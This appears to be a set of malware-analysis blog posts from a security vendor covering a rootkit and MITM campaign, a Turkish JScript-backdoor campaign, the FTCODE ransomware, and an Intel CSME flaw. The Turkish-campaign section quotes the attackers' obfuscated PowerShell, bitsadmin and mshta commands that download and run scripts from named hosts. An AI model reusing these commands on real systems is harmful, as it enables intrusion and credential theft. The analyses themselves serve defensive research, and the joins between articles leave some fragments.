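def trailing_bytes_after_jpeg(blob: bytes) -> bytes:
    """Return whatever follows the last JPEG end-of-image marker (FF D9).

    A legitimate JPEG ends at the marker; a long tail strongly suggests
    that a payload was concatenated to the image, as in this campaign."""
    eoi = blob.rfind(b"\xff\xd9")
    if eoi == -1:
        return b""  # no marker at all: not a JPEG
    return blob[eoi + 2:]

fake_jpeg = b"\xff\xd8" + b"\x00" * 64 + b"\xff\xd9"
print(len(trailing_bytes_after_jpeg(fake_jpeg)))          # clean image: 0
print(trailing_bytes_after_jpeg(fake_jpeg + b"PAYLOAD"))  # appended data
```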

Figure 18. Payload received by the rootkit installed in the system
Among all the payloads received at this stage, the PE file for MITM attacks stands out. Its hash sum is b9fcf48376083c71db0f13c9e344c0383bafa5b116fbf751672d54940082b99a, and the image is stored here. In the traffic, execution of this PE file can be detected by a GET request:


The received module checks for processes named devenv.exe, OLLYDBG.EXE, Dbgview.exe, windbg.exe, MSDEV.exe, Delphi32.exe, E.exe, PCHunter32.exe, and PCHunter64.exe, as well as the processes ZhuDongFangYu, 360Safe, and 360Tray. The presence of this module in the system can be detected by the file C:\Windows\Temp\5B7C84755D8041139A7AEBA6F4E5912F.dat:


In the course of its work, a GET request is used to download the certificates server.crt, server.key, server.der, and startcom.crt.


The names of the module's classes make the attackers' intent quite clear.

Figure 19. Names of module classes for MITM attack

Conclusion

This malware consists of a loader, a decoy file, a rootkit driver, and a module for man-in-the-middle attacks. The malware covertly delivers its payload by merging the data with JPEG images. For their command servers, the attackers register names in the .top and .bid domain zones and on cloud platforms.

The malware developers used the following methods to hide their activities:

  • Posing as a legitimate application
  • Posing as an image in the traffic
  • Gaining a foothold as a rootkit

The discussed threat is identified by PT Network Attack Discovery as Spy.GmFUToMitm.
IOC:

1953db709a96bc70d86f7dfd04527d3d0cb7c94da276ddf8f0ef6c51630a2915
1ab1b2fe3ce0fd37a0bb0814a2cac7e974f20963800f43d2f5478fc88c83a3da
1c8dbaf0a5045e2b4a6787635ded8f51d8e89a18e398c0dd79b1b82a968df1a0
9b7082ac4165b25a3b22f2aafdd41ea5f3512a76693f6a6b3101873a9cded961
9cee3f6d6e39adfa0d4712541c070b9c2423275698be0c6cd6cd8239d8793250
b9fcf48376083c71db0f13c9e344c0383bafa5b116fbf751672d54940082b99a
df3e7b04d988cf5634ec886321cb1ac364a46181e7a63f41f0788753e52dcf34
eb67c1d69eb09e195b8333e12c41a0749e7e186c9439f1e2c30f369712ce2c12
http://63634.top/ 
http://anli.bid/
http://shangdai.bid/
http://b-blog.oss-cn-beijing.aliyuncs.com

Authors: Dmitry Makarov, Evgeny Ustinov, Positive Technologies

Turkish tricks with worms, RATs… and a freelancer


The Positive Technologies Expert Security Center has detected a malicious campaign active since at least mid-January 2018. The operation mostly targeted users in Brazil, Germany, Hungary, Latvia, the Philippines, Turkey, the United Kingdom, and the United States. This long-running operation involved a number of tools and techniques for infecting and controlling victim PCs. Here we detail the stages of infection, the utilities and network infrastructure used, and the digital traces that led us to the alleged hacker.

Executive summary

  • Attackers reworked and modernized a 10-year-old worm 
  • Unusual set of tools and extensive network infrastructure
  • The main suspect is a Turkish freelancer

Payload delivery

Office documents

On April 5, 2019, as part of tracking new threats, specialists at the PT Expert Security Center investigated a suspicious Microsoft Office document. The file had the .docm extension (modern Microsoft Word format with support for macros). We also know that it:
  • Was created several days prior to detection (2019-03-31)
  • Contained an image asking the user to enable macros
  • Was created on a Turkish-language system (as indicated by values of metadata fields: "Konu Başlığı" / "Subject Heading" and "Konu Ba l , 1" / "Thread Title, 1"—as translated by Google Translate)
Figure 1. Typical message for tricking victims into enabling macros
The macro code is slightly obfuscated but compact. It uses a Background Intelligent Transfer Service (BITS) PowerShell cmdlet to download and run a JScript script from the attacker's server:
Shell ("pow" & "ershe" & "ll -comm" & "and ""$h1='e';&('i' + $h1 + 'x')('Import-Module BitsTransfer;Start-BitsTransf' + $h1 + 'r https://definebilimi.com/1/b12.js $env:t' + $h1 + 'mp\bb1.js;');Start-Process -WindowStyle hidden -FilePath 'cmd.exe' -ArgumentList '/c %systemroot%\system32\wscript %temp%\bb1.js'""")
The reason for use of PowerShell as well as the unusual module for downloading files from the web server is to evade restrictions on opening and running untrusted programs.

There are some similar documents. One of them is a .doc file (old Microsoft Word format) with Turkish character code page. The macro works in a very similar way:

Shell "cmd.exe /c bitsadmin /transfer myjob /download /priority FOREGROUND https://definebilimi.com/up3e.js %temp%\o2.js & wscript.exe %temp%\o2.js", vbHide

Here the malware author is using the same BITS technique, but now with the help of the legitimate system utility bitsadmin. Note that both the document's creation date and the time of its detection on public sources point to the middle of July 2018. So the attacks have been in progress for around a year, at a minimum. The payload is downloaded from the same attacker server, and the approach to naming the JScript script is similar too.

A different document has the extension .rtf (Rich Text Format). The file has several embedded .xls (old Microsoft Excel format) documents with identical contents. The macro code is completely identical to that from the first document. This, as well as the identical values of the code page and HeadingPairs XML field, suggests a common author.

LNK shortcuts

Not only Office documents were used for initial infection. We found a few malicious .lnk (Windows Shell Link) files that, when run, triggered execution of the following command:

C:\Windows\System32\cmd.exe /c powershell -command "$h1='e';&('i' + $h1 + 'x')('Import-Module BitsTransfer;Start-BitsTransf' + $h1 + 'r https://definebilimi.com/1/b12.js $env:t' + $h1 + 'mp\bb.js;')" & %systemroot%\system32\wscript %temp%\bb.js

The shortcuts were distributed during mid-March and late April 2019.

Their metadata contains the username win7-bilgisayar (in translation from Turkish: "win7-computer"), indicating the user of the system on which the shortcuts were created.

Phishing emails were the most likely method used for delivering the malicious files for initial infection.

The metamorphoses of Houdini

Minor differences aside, all the objects for the initial infection stage download and run the same JScript script. The file is not obfuscated or packed. The only step taken to confound analysis was use of random variable names. The script is a WSH backdoor with the following properties:

  • The C2 address and port are hard-coded.
  • C2 is performed via HTTP POST requests.
  • When the script starts, the string "is-bekle" ("bekle" is Turkish for "wait") is inserted in the URI field.
  • The User-Agent field contains brief information about the system, separated by a script-defined delimiter (in this case, "<|>"):
    • Hard disk serial number
    • Username
    • System version
    • Script name
    • Antivirus software name
    • Value of the %ProgramData% environment variable
    • Whether .NET Framework 4.5.2 is installed
    • Wait time between requests
    • Whether Java is installed
  • It checks whether it is running in a Kaspersky Lab sandbox based on the hard disk serial number. If the number is a match, the script stops running.
  • It gets and runs server commands, which include:
    • Downloading a file from the server
    • Uploading a file to the server
    • Stealing the clipboard contents
    • Stealing contents of a folder
    • Getting information on current processes
    • Running commands (cmd.exe)
    • Taking and sending screenshots
    • Extracting and sending stored Chrome and Opera passwords
Figure 2. Beginning of the JScript script downloaded from the attacker server
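Assuming the nine fields listed above arrive in that order, a captured beacon can be split back into named values. The field labels below are our own shorthand, not names defined by the script:

```python
# Our own labels for the nine values the backdoor packs into User-Agent.
FIELDS = [
    "disk_serial", "username", "os_version", "script_name", "antivirus",
    "programdata", "dotnet_452", "wait_time", "java_installed",
]

def parse_beacon(user_agent: str, sep: str = "<|>") -> dict:
    """Split the backdoor's User-Agent beacon into named fields."""
    return dict(zip(FIELDS, user_agent.split(sep)))

ua = "<|>".join(["1A2B3C4D", "victim", "6.1", "bb1.js", "Defender",
                 "C:\\ProgramData", "yes", "5000", "no"])
info = parse_beacon(ua)
print(info["username"])
```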
Based on the comments, code structure, command names, and format for gathering system information, we find parallels with the well-known Houdini VBS worm. In 2013, researchers at FireEye picked apart the functions of Houdini, which handles commands and collects information in a similar way. It would seem that in our case, the attacker borrowed from the well-known worm, rewrote its functions in JScript instead of VBScript, and replaced some English strings with Turkish ones for his convenience.

Figure 3. Handling of JScript backdoor commands
The strings passing the results of command execution contain "Bcorp" in their name. This same combination of letters is present in the name of the C2 server: ip1[.]bcorp.fun.

Attacker's server

According to Shodan as of April 30, 2019, the attacker's host was running an AppServ web server. The server was not locked down very well: for example, the phpinfo page (which displays configuration information of interest) was accessible. Analysis of the URLs used to download malware showed that the server has a public directory (./a) listing the attacker's other tools.

Figure 4. Home page of the attacker's server
Figure 5. phpinfo page on the attacker's server
Figure 6. Contents of publicly available directory on the attacker's server as of late April 2019

Figure 7. Contents of publicly available directory on the attacker's server as of late May 2019
Here are descriptions of some of the files we found.

Houdini JScript

Most of all, we found a large number of variations on the modified Houdini worm we just looked at. Changes from version to version were small: different host names (husan2.ddns.net, ip1.bcorp.fun, ip1.qqww.eu), ports (86, 87), and variable names. Particular commands appeared or disappeared. One version was even embedded in a JScript scriptlet.

Figure 8. Houdini JScript in scriptlet form

Bcorp JAR

This independently created lightweight backdoor, written in Java, uses TCP port 22122 for C2. Capabilities include:

  • Running commands in cmd.exe
  • Determining the OS version
  • Listing directories
  • Uploading files
  • Adding itself to the startup items folder and autostart registry key

This appears to be why the modified worm checks for the presence of Java on the system. But it is not clear why an additional backdoor would be needed, given that the first one already has a wide range of functions.

Get-ChromeCreds

This PowerShell wrapper extracts browsing history, usernames, passwords, and cookies from Google Chrome. Some versions contain the library System.Data.SQLite.dll for x86 and x64 systems in base64 encoding; the other versions assume that the library will be present in the %APPDATA% folder. Provided as a plugin component for the main JScript backdoor.

Start-KeyLogger

This PowerShell implementation of a simple keylogger is also provided as a plugin component for the main JScript backdoor.

Figure 9. Code fragment from the PowerShell keylogger

WebBrowserPassView

This utility from Nirsoft grabs usernames and passwords from popular browsers. The attackers used a specially tweaked version, having packed it with ASPack to complicate analysis or bypass signature detection.

NetWire RAT

This publicly available commercial remote administration tool is used by a number of cybercrime groups. In this case, obfuscation was accomplished by packing the RAT in a .NET PE file and applying DeepSea 4.1.

TCP Listen

This bare-bones GUI utility from AllScoop is used to test router and firewall settings. For each listening port, it returns a predefined string and closes the connection.

Figure 10. TCP Listen GUI

LNK loader

This tool is similar to the ones described already. When run, it performs the following command:
C:\Windows\System32\cmd.exe /v /c "set i=h&&ms!i!ta http://ip1.qqww.eu/1/f.htm"
In this case the shortcut was created under another user (desktop-amkd3n3).

Script loaders

We have put all the loaders for the already-mentioned RATs in this group. They are all small (less than 1 KB each) and in various formats (such as .htm, .xsl, and .hta). They are written in various languages, both of the scripting variety (JScript, PowerShell) and compiled-on-the-fly (C#). Here are code fragments from a few samples:

Figure 11. Fragment of the .htm loader
Figure 12. Fragment of the .xsl loader
Figure 13. Fragment of the .ps1 loader

Tiny PE loaders

Besides script loaders, we also found .NET PE files. These files, too, were small (up to 10 KB) but with similarly extensive functionality:

Figure 14. Sample of decompiled code from one of the PE loaders

xRAT

An open-source remote administration tool. Many versions and modifications are available publicly. Written in C# with partial obfuscation.

Bcorp panel and builder

Server-side component of the JScript backdoor. It also serves as the builder for the client side. A .NET PE, the component is not obfuscated or packed. The interface resembles that of a tweaked Houdini server. It can send commands plus additional components and plugins to an infected machine: Java environment, PowerShell scripts and Nirsoft utility to grab browser data, PowerShell keylogger scripts, and others. Note that the project is named BcorpRat, as can be seen in the title bar of the window in the following screenshot. The namespace of the source code contains "Btech" in its name—remember this detail for later.

Figure 15. JScript backdoor admin panel: main window
Figure 16. JScript backdoor admin panel: client-side builder window

Network infrastructure

Now let us take a closer look at the addresses used for interaction with the attacker's malware. We will start with the domain definebilimi.com, with which the Office documents and LNK loaders communicate.

definebilimi.com

The domain changed owners on January 16, 2018. (Incidentally, "define bilimi" is Turkish for "the science of treasure (hunting).") Below are some of the most interesting WHOIS tidbits from that time.

Table 1. Information about the registrant (owner) of definebilimi.com
It would be hasty to take this information at face value, of course. The indicated country and the frequency of occurrence of traces of the Turkish language in the code allow us to assume that these coincidences are not accidental. And the email address contains "btech," which is a bit of a recurring theme.

The history of NS servers for the domain is interesting:

Table 2. History of NS servers for definebilimi.com
The hosts buhar.biz and qqww.eu have already been encountered in malware.

buhar.us

The history of this domain ("buhar" means "steam" in Turkish) starts on January 16, 2018, the same day as definebilimi.com.

Table 3. Information about the registrant (owner) of buhar.us
The situation is similar: most of the data looks fake, other than the email address ("buharcin" is Turkish for "steamer").

bcorp.fun

Registered on March 23, 2019. The registration country is (yet again) Turkey and the client organization is "Bcorp." Not to mention that we see "bcorp" in the name of the domain itself—a string that should look familiar by now.

husan2.ddns.net

The attacker used at least one unconventional way to handle hosting. Starting in mid-March 2019, we were able to record use of dynamic DNS servers. Such servers enable attackers to hide their IP addresses and keep their C2 alive for longer. The choice of names was somewhat predictable: a few months later we detected use of husan3.ddns.net, while husan.ddns.net was active as far back as April 2017.

bkorp.xyz

Starting in early April, the hacker registered domains with anonymization from WhoisGuard, Inc., which is located in Panama. Some examples include bkorp.xyz, prntsrcn.com, and i37-imgur.com. The NS servers used link these domains to the other malicious ones.

qqww.eu

This domain—like bcorp.fun—has the subdomain ip1. The registrant (Osbil Technology Ltd.) is supposedly located in Berlin. In reality, a company with the same name is located on the east coast of Cyprus in the city of Famagusta, in the partially recognized Turkish Republic of Northern Cyprus. The company's official site is hosted on a domain that acted as NS server for bcorp.fun from March to May 2019. We did not find any signs of compromise of the name servers. Because of the NS provider's configuration (with the provider's information replacing the client's in the registrant field) client information was hidden from public view.

  Figure 17. Information about the registrant (owner) of qqww.eu  


IP addresses

For a fuller picture, we will give IP addresses with some of the domains corresponding to them at various points in time:
  • 5.255.63.12
    • bcorp.fun
    • husan.ddns.net
    • husan2.ddns.net
    • husan3.ddns.net
    • qqww.eu
  • 192.95.3.137
    • bcorp.fun
    • bkorp.xyz
    • definebilimi.com
    • i36-imgur.com
    • i37-imgur.com
    • i38-imgur.com
    • i39-imgur.com
    • prntsrcn.com
    • qqww.eu
  • 192.95.3.140
    • bkorp.xyz
    • buhar.us

On the trail of the hacker

Among the malicious tools and utilities found on the attacker's server, we uncovered a curious image:

  Figure 18. Image file found on the attacker's web server  




The image size has not been reduced; it is shown here with the exact same dimensions as on the server.

Despite the poor image quality, we were able to establish that this is a screenshot of a transaction page on blockr.io. That was a dead end, but we then searched for associations with the image's file name (IMG_JPEG-0371e4dce3c8804f1543c3f0f309cc11.jpg) and uncovered an online scan result for a file with the same name. The analyzed object was a Windows shortcut similar to the ones discussed previously. Attached was an image containing the photo ID card of a Turkish citizen. The last name on the card (Yaman) matches one found repeatedly in the domain registration records.

Figure 19. ID card found with LNK loader
The scan of the shortcut in the online sandbox was triggered not by a user uploading a file, but by access to the following target URL:

hxxps://github.com/btechim/prntsrcn/blob/nm46ny/IMG-0371e4dce3c8804f1543c3f0f309cc11.jpg.lnk?raw=true
The user's Github account is now blocked, but based on the URL we can deduce the user's handle (btechim) and the name of the project (prntsrcn). The project name matches the name of one of the domains used in the campaign (prntsrcn.com). The user handle contains "btech," which we saw in the software for the admin panels described already.

Searching for this same handle led us to a freelancer hiring site. There we found a page for a freelancer in Turkey with the same handle, along with a confirmed phone number, mailing address, and Facebook profile. He offers his services in software development and cybersecurity.

  Figure 20. The suspected attacker's page on a freelancer hiring site  

Conclusions

Positive Technologies tracked this malicious campaign of Turkish origin for several months. It is rare to see a single series of attacks combining both modern techniques and modified 10-year-old tools. The attacker employed tools of diverse purpose, platform, and sophistication to obtain total control over victim PCs, and used a wide range of techniques to hide his identity when establishing the network infrastructure. But it was not possible to account for everything, and pride and a few slipups ultimately gave the game away. The research was sent to the Turkish Information Security Incident Response Center.

Author: Aleksey Vishnyakov, Positive Technologies

IOCs

Office loaders

3305720da73efbcb7d25edbb7eff5a1a
5b6d77f3e48e7723498ede5d5ba54f26
621a0133e28edec77a2d3e75115b8655
712e7ec49ad3b8c91b326b6d5ee8dcd8
731a3d72e3d36c2270c1d0711c73c301
929374b35a73c59fe97b336d0c414389

LNK loaders

3bc5d95e2bd2d52a300da9f3036f5b3b
527069e966b4a854df35aef63f45986a
a4667e0b3bfaca0cda5c344f1475b8e0

Houdini JScript

04c2ad67de2cea3f247cf50c5e12e969
5ab9176b9ed9f7a776ec82c412a89eab
84f0d098880747f417703f251a2e0d1c
94c6ba0d812b4daf214263fffc951a20
a52509a38846b55a524019f2f1a06ade
bf2fb6cdbc9fde99e186f01ad26f959f
c871091ce44594adbd6cf4388381e410
daf6a9eb55813d1a151695d33506179d
f010af1b330d00abb5149e9defdae6ee
ff924faeb9dfd7384c05abe855566fc9

Bcorp JAR

59978b5a9e4ab36da0f31a8f616cc9d3
a7219da3b0c0730c476fe340dbf7e4e5
ddac55213089da9ef407bce05ebe653e

Get-ChromeCreds

11769e9f49123a2af00bd74453221c07
1a81c9119d7761535c198ddb761979b8
42a85849a591e65b0254d9bcbdf59f82
8e49263f33c53ee5bc91bebbf9617352
c9ab090ad2badb9862fd5b6058428096

Start-KeyLogger

55daa84475a11ea656183e0ad5ccc608
aa82fbb6a341d71d2431b6d2ebca027c

WebBrowserPassView

7722e086cf7ed59955a1d6ec26f49cf3

NetWire RAT

1470a08bd427bb8738a254ba4f130ff5
5f8495016773c7834b1c588f0997a6c4

TCP Listen

913567da98185cad9f91a570dc298de1

Script loaders

02946d10c6a34fe74826f3c0b0a6a3e0
1ad644bdba488a6e42ad76aea2c0ee54
3a2dcf36b9206a135daa73c645a3f56f
4dddd87d3cb80145c9859fd76dfef794
74c5e5be9f79bd9e7ee84fd046c14e68
78f4d5fa6c68dae4b03860b54ec6cc67

Tiny PE loaders

0f3c56018a7051aebe060454fc981f5b
1b9cefc229daddc4557cea0e3bdf4656
29e6679107bd9c72aa061371082206bb
b66b7395825b9ed656b768d4e7fe1de7
fbc606b8b04e51ddb342e29b84ac1edb

xRAT

2e9a0637478938cc3e4519aa7b4219cc
7c67c93ba243be32e5fd6a6921ceded3

Bcorp panel and builder

405c987ba1a8568e2808da2b06bc9047
c3ac8b7a7c8c0d100e3c2af8ccd11441

Bcorp C2

bcorp.fun
bkorp.xyz
buhar.us
definebilimi.com
husan.ddns.net
husan2.ddns.net
husan3.ddns.net
i36-imgur.com
i37-imgur.com
i38-imgur.com
i39-imgur.com
prntsrcn.com
qqww.eu
5.255.63.12
192.95.3.137
192.95.3.140


Fileless ransomware FTCODE now steals credentials

In 2013, SophosLabs reported infections by ransomware written in PowerShell. The attack targeted users in Russia. The ransomware encrypted files and renamed them with the extension .FTCODE, whence the name of the malware. It arrived as spam containing an HTA file attachment. The ransom demand took the form of a text file with a message in Russian instructing the victim on how to pay the ransom and decode the files.

A few years later, in autumn 2019, new mentions of FTCODE infections appeared. Hackers ran a phishing campaign targeting recipients of PEC certified emails in Italy and other countries. Victims received emails with attachments containing macros that downloaded malicious code. Apart from encryption, the ransomware also installed JasperLoader, a Trojan downloader, on victims' computers. This Trojan can be used to distribute various types of malware. For example, there have been cases when attackers downloaded the Gootkit banking Trojan onto victims' computers.

In mid-October 2019, a new version of the ransomware appeared capable of stealing passwords and credentials from users' computers. The data is retrieved from popular browsers and mail clients installed with default parameters.

PowerShell is often used to develop malware because the language interpreter is included with Windows 7 and later. PowerShell also allows running malicious code without saving it to a file on the victim's computer. A webinar on such threats is available on the Positive Technologies website.

Payload delivery

First, attackers run the script nuove_tariffe_2020_8_af11773ee02ec47fd5291895f25948e7.vbs that launches the PowerShell interpreter.

Figure 1. Downloading payload
The interpreter receives a string of commands that downloads the image hxxps://static[.]nexilia[.]it/nextquotidiano/2019/01/autostrade-aumenti-tariffe-2019[.]jpg (Figure 2) and saves it as tarrife.jpg in the temporary folder.

Figure 2. Image tarrife.jpg used to distract user's attention
The image is then opened, and at the same time the ransomware is downloaded from the Internet without being saved to disk. Unlike in previous infections, the malware body is distributed encoded with Base64. To deliver the payload, the attackers use the domains band[.]positivelifeology[.]com (Figure 3) and mobi[.]confessyoursins[.]mobi.

Figure 3. Traffic fragment with ransomware code

Stealing user credentials

As noted already, the new ransomware version has a module for stealing user credentials and passwords from popular browsers and mail clients, such as Internet Explorer, Mozilla Firefox, Chrome, Outlook, and Mozilla Thunderbird.

First, the command start chooseArch is sent via an HTTP POST request to the attackers' server at the domain surv[.]surviveandthriveparenting[.]com.

Figure 4. 
At this stage, the generated traffic usually contains a string of the form guid=temp_dddddddddd followed by commands or stolen data (Figure 5). The string contains a guid that is unique for each ransomware sample.
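For traffic hunting, the identifier can be matched with a simple regular expression, assuming ten digits as in the pattern shown above:

```python
import re

# Matches the guid=temp_dddddddddd pattern observed in FTCODE traffic.
GUID_RE = re.compile(r"guid=temp_(\d{10})")

def extract_guid(http_body: str):
    """Pull the per-sample identifier out of a captured request body, if any."""
    m = GUID_RE.search(http_body)
    return m.group(1) if m else None

print(extract_guid("guid=temp_0123456789&cmd=chooseArch"))
print(extract_guid("guid=other"))
```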

Figure 5. Code used by the stealer for network exchange
Next, the victim's credentials and passwords are extracted, encoded with Base64, and sent to the attackers.

Figure 6. Code for transferring user credentials
Below is a fragment of traffic with stolen data sent via an HTTP POST request.

Figure 7. Stolen data
Once the stolen data is sent, the stealer sends an HTTP POST request signaling that it has completed its work.

Figure 8. Signal about successful data theft


Installation of the JasperLoader downloader

The new ransomware version downloads and installs the JasperLoader downloader (Figure 9) that can be used to distribute malware.

Figure 9. Traffic fragment with JasperLoader code
Once downloaded, JasperLoader is saved to the file C:\Users\Public\Libraries\WindowsIndexingService.vbs and added to Windows tasks as WindowsApplicationService and to the startup folder via WindowsApplicationService.lnk.

Figure 10. Installation of the downloader

Data encryption

In addition to stealing user credentials and installing the downloader, FTCODE encrypts files on a victim's computer.

The first step is to prepare the environment. The ransomware uses the file C:\Users\Public\OracleKit\quanto00.tmp to save the time of its last run, so it checks whether the file is present in the system and when it was created. If the file exists and was created less than 30 minutes ago, the process terminates (Figure 11). This behavior can be used as a vaccine.
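This check can be turned against the malware. The sketch below mimics the test, using the file's modification time as a stand-in for its creation time (which is what Python exposes portably); periodically touching the marker file would then act as a simple vaccine:

```python
import os
import tempfile
import time

MARKER = r"C:\Users\Public\OracleKit\quanto00.tmp"  # path used by FTCODE

def ransomware_would_exit(marker_path: str, window_sec: int = 30 * 60) -> bool:
    """Mimic the malware's own check: exit if the marker file is fresh."""
    if not os.path.exists(marker_path):
        return False
    return time.time() - os.path.getmtime(marker_path) < window_sec

# Demonstrate with a freshly created temporary file instead of MARKER.
with tempfile.NamedTemporaryFile(delete=False) as f:
    path = f.name  # just created, so its timestamp is "now"
print(ransomware_would_exit(path))  # fresh marker: the malware would exit
```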

Figure 11. Checking the period of time after the last running of the ransomware
After that, an identifier is read from the file C:\Users\Public\OracleKit\w00log03.tmp, or a new one is created if the file is not available.

Figure 12. Preparing victim's identifier


Figure 13. Victim's identifier
Then the ransomware generates key information needed to encrypt the files.

Figure 14. Generation of key information for encryption
As can be seen in the code, the information needed to restore the victim's data is sent via an HTTP POST request to a host at the domain food[.]kkphd[.]com.

Figure 15. Sending key information for encryption/decryption
Therefore, anyone who manages to intercept the traffic containing the salt used for file encryption can restore the files without paying a ransom to the attackers.
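If the request is captured (for example, by a traffic analysis tool or a proxy), the field can be recovered with the standard library. The field name salt and the body below are hypothetical illustrations; use whatever names appear in the actual intercepted request (Figure 16):

```python
from urllib.parse import parse_qs

def extract_field(post_body: str, field: str):
    """Pull one form field out of a captured HTTP POST body."""
    return parse_qs(post_body).get(field, [None])[0]

# Illustrative body only; real field names come from the intercepted request.
captured = "guid=temp_0123456789&salt=QmFzZTY0U2FsdA%3D%3D"
print(extract_field(captured, "salt"))
```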

Figure 16. Intercepted key information
To encrypt victims' files, the ransomware uses the Rijndael algorithm in CBC mode, with an initialization vector based on the string "BXCODE INIT" and a key derived from the password "BXCODE hack your system" and the previously generated salt.

Figure 17. Encryption function
Right before the encryption starts, a "start" signal is sent via an HTTP POST request. If a file exceeds the size limit of 40,960 bytes, the file size is reduced accordingly. A new extension is appended to the files: not .FTCODE, as in previous ransomware versions, but the randomly generated one that is sent to the attackers' server as the value of the parameter ext.
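Two of these details can be sketched in Python. We assume the size reduction means only the first 40,960 bytes of a large file are processed, and the extension generator (length and alphabet) is our own guess for illustration:

```python
import secrets
import string
import tempfile

LIMIT = 40_960  # FTCODE's per-file size limit before encryption

def random_ext(length: int = 6) -> str:
    """Random extension of the kind appended instead of the old .FTCODE.

    The real generator is not documented here; six lowercase letters
    is an assumption for illustration."""
    return "." + "".join(secrets.choice(string.ascii_lowercase)
                         for _ in range(length))

def bytes_to_encrypt(path: str) -> bytes:
    """Read at most LIMIT bytes, mirroring the size reduction."""
    with open(path, "rb") as f:
        return f.read(LIMIT)

# Demonstrate on a 50,000-byte stand-in file.
with tempfile.NamedTemporaryFile(delete=False) as f:
    f.write(b"A" * 50_000)
    sample = f.name
print(len(bytes_to_encrypt(sample)))  # capped at 40960
```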

Figure 18. Encrypted files
After that, an HTTP POST request is sent containing the signal "done" and the number of encrypted files.

Figure 19. Ransomware main code
Full list of extensions of files encrypted on victim's computer

"*.sql""*.mp4""*.7z""*.rar""*.m4a""*.wma"
"*.avi""*.wmv""*.csv""*.d3dbsp""*.zip""*.sie"
"*.sum""*.ibank""*.t13""*.t12""*.qdf""*.gdb"
"*.tax""*.pkpass""*.bc6""*.bc7""*.bkp""*.qic"
"*.bkf""*.sidn""*.sidd""*.mddata""*.itl""*.itdb"
"*.icxs""*.hvpl""*.hplg""*.hkdb""*.mdbackup""*.syncdb"
"*.gho""*.cas""*.svg""*.map""*.wmo""*.itm"
"*.sb""*.fos""*.mov""*.vdf""*.ztmp""*.sis"
"*.sid""*.ncf""*.menu""*.layout""*.dmp""*.blob"
"*.esm""*.vcf""*.vtf""*.dazip""*.fpk""*.mlx"
"*.kf""*.iwd""*.vpk""*.tor""*.psk""*.rim"
"*.w3x""*.fsh""*.ntl""*.arch00""*.lvl""*.snx"
"*.cfr""*.ff""*.vpp_pc""*.lrf""*.m2""*.mcmeta"
"*.vfs0""*.mpqge""*.kdb""*.db0""*.dba""*.rofl"
"*.hkx""*.bar""*.upk""*.das""*.iwi""*.litemod"
"*.asset""*.forge""*.ltx""*.bsa""*.apk""*.re4"
"*.sav""*.lbf""*.slm""*.bik""*.epk""*.rgss3a"
"*.pak""*.big""*wallet""*.wotreplay""*.xxx""*.desc"
"*.py""*.m3u""*.flv""*.js""*.css""*.rb"
"*.png""*.jpeg""*.txt""*.p7c""*.p7b""*.p12"
"*.pfx""*.pem""*.crt""*.cer""*.der""*.x3f"
"*.srw""*.pef""*.ptx""*.r3d""*.rw2""*.rwl"
"*.raw""*.raf""*.orf""*.nrw""*.mrwref""*.mef"
"*.erf""*.kdc""*.dcr""*.cr2""*.crw""*.bay"
"*.sr2""*.srf""*.arw""*.3fr""*.dng""*.jpe"
"*.jpg""*.cdr""*.indd""*.ai""*.eps""*.pdf"
"*.pdd""*.psd""*.dbf""*.mdf""*.wb2""*.rtf"
"*.wpd""*.dxg""*.xf""*.dwg""*.pst""*.accdb"
"*.mdb""*.pptm""*.pptx""*.ppt""*.xlk""*.xlsb"
"*.xlsm""*.xlsx""*.xls""*.wps""*.docm""*.docx"
"*.doc""*.odb""*.odc""*.odm""*.odp""*.ods"
"*.odt"

Once the files are encrypted, an HTML file named READ_ME_NOW.htm is created on the victim's computer. The file instructs the victim on what to do to restore the files.

Figure 20. Attacker message to a victim
Each victim receives a unique link containing an identifier from the file C:\Users\Public\OracleKit\w00log03.tmp. If that file is damaged or deleted, the encrypted data may never be restored. The link leads to a page on the Tor network with a form containing a ransom demand for decrypting the files. The initial ransom amount is 500 US dollars, and it increases over time.

Figure 21. Ransom demand

End of work

Once the files are encrypted, FTCODE removes data that can be used to restore the files.

Figure 22. Removal of data

Conclusion

The malware consists of a downloader (VBS code) and a payload (PowerShell code). A JPEG image is used to mask the encryption code. The ransomware installs the well-known JasperLoader downloader, encrypts a victim's files to extort a ransom, and steals credentials and passwords from popular browsers and mail clients.

The threat is identified by PT Network Attack Discovery (PT NAD) as FTCODE.

PT NAD also stores network traffic, which can help decrypt the files of ransomware victims.

Author: Dmitry Makarov, Positive Technologies

IOCs

6bac6d1650d79c19d2326719950017a8
bf4b8926c121c228aff646b258a4541e
band[.]positivelifeology[.]com
mobi[.]confessyoursins[.]mobi
surv[.]surviveandthriveparenting[.]com
food[.]kkphd[.]com

Intel x86 Root of Trust: loss of trust



The scenario that Intel system architects, engineers, and security specialists perhaps feared most is now a reality. A vulnerability has been found in the ROM of the Intel Converged Security and Management Engine (CSME). This vulnerability jeopardizes everything Intel has done to build the root of trust and lay a solid security foundation on the company's platforms. The problem is not only that it is impossible to fix firmware errors that are hard-coded in the Mask ROM of microprocessors and chipsets. The larger worry is that, because this vulnerability allows a compromise at the hardware level, it destroys the chain of trust for the platform as a whole.

Positive Technologies specialists have discovered an error in Intel hardware, as well as an error in Intel CSME firmware at the very early stages of the subsystem's operation, in its boot ROM. Intel CSME is responsible for initial authentication of Intel-based systems by loading and verifying all other firmware for modern platforms. For instance, Intel CSME interacts with CPU microcode to authenticate UEFI BIOS firmware using BootGuard. Intel CSME also loads and verifies the firmware of the Power Management Controller responsible for supplying power to Intel chipset components.

Even more importantly, Intel CSME is the cryptographic basis for hardware security technologies developed by Intel and used everywhere, such as DRM, fTPM, and Intel Identity Protection. In its firmware, Intel CSME implements EPID (Enhanced Privacy ID). EPID is a procedure for remote attestation of trusted systems that allows identifying individual computers unambiguously and anonymously, which has a number of uses: these include protecting digital content, securing financial transactions, and performing IoT attestation. Intel CSME firmware also implements the TPM software module, which allows storing encryption keys without needing an additional TPM chip—and many computers do not have such chips.

Intel tried to make this root of trust as secure as possible. Intel's security is designed so that even arbitrary code execution in any Intel CSME firmware module would not jeopardize the root cryptographic key (Chipset Key), but only the specific functions of that particular module. Plus, as the thinking went, any risks could be easily mitigated by changing encryption keys via the security version number (SVN) mechanism. This was demonstrated in 2017, when an arbitrary code execution vulnerability was found in the BringUP (bup) firmware module, as described in Intel SA-00086. At that time, Intel simply generated new keys by incrementing the SVN, easily preventing any compromise of EPID-based technologies.

